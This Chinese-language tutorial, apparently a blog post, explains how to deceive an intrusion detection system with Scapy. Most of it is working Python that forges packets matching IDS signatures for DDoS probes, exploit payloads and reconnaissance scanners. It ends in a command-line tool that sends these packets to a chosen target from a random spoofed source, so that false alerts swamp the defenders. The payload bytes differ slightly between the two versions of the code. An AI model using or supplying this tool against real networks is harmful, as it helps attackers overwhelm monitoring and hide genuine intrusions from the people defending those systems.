所谓愚弄入侵检测系统,其原理是使通过制造假的攻击迹象来触发IDS警报,从而让目标系统产生大量警告而难以作出合理的判断,利用Scapy这个第三方Python库,可以很好的实现对入侵检测系统的愚弄。
首先分析触发报警条件假设为TFN探针:ICMP id为678,ICMP type为8,内容含有"lyshark"则触发报警,我们只要构造这个ICMP包并发送到目标主机即可。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
# 触发DDoS警报
def fuck_ddos(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='lyshark')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
send(pkt, iface=iface, count=count)
src = "192.168.1.100"
dst = "192.168.1.200"
iface = "eth0"
count = 1
fuck_ddos(src, dst, iface, count)再比如,当含有指定字节序列就会触发警报,为了生成含有该指定字节序列的数据包,可以使用符号\x,后面跟上该字节的十六进制值。
# 触发exploits警报
def exploitTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00\x00")
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE\xC8")
send(pkt, iface=iface, count=count)接着伪造并触发踩点扫描警报,只要我们数据包中含有特定的特征码即可触发警报,我们构造一下。
def scanTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
send(pkt)
pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')
send(pkt, iface=iface, count=count)最后我们整合代码,生成可以触发DDoS、exploits以及踩点扫描警报的数据包。
#coding=utf-8
import optparse
from scapy.all import *
from random import randint
# 触发DDoS警报
def ddosTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='lyshark')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
send(pkt, iface=iface, count=count)
# 触发exploits警报
def exploitTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00")
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE")
send(pkt, iface=iface, count=count)
# 触发踩点扫描警报
def scanTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
send(pkt)
pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')
send(pkt, iface=iface, count=count)
if __name__ == '__main__':
# -s参数指定发送的源地址,-c参数指定发送的次数。
parser = optparse.OptionParser('main.py -i <iface> -s <src> -t <target> -c <count>')
parser.add_option('-i', dest='iface', type='string', help='specify network interface')
parser.add_option('-s', dest='src', type='string', help='specify source address')
parser.add_option('-t', dest='tgt', type='string', help='specify target address')
parser.add_option('-c', dest='count', type='int', help='specify packet count')
(options, args) = parser.parse_args()
if options.iface == None:
iface = 'eth0'
else:
iface = options.iface
if options.src == None:
src = '.'.join([str(randint(1,254)) for x in range(4)])
else:
src = options.src
if options.tgt == None:
exit(0)
else:
dst = options.tgt
if options.count == None:
count = 1
else:
count = options.count
ddosTest(src, dst, iface, count)
exploitTest(src, dst, iface, count)
scanTest(src, dst, iface, count)
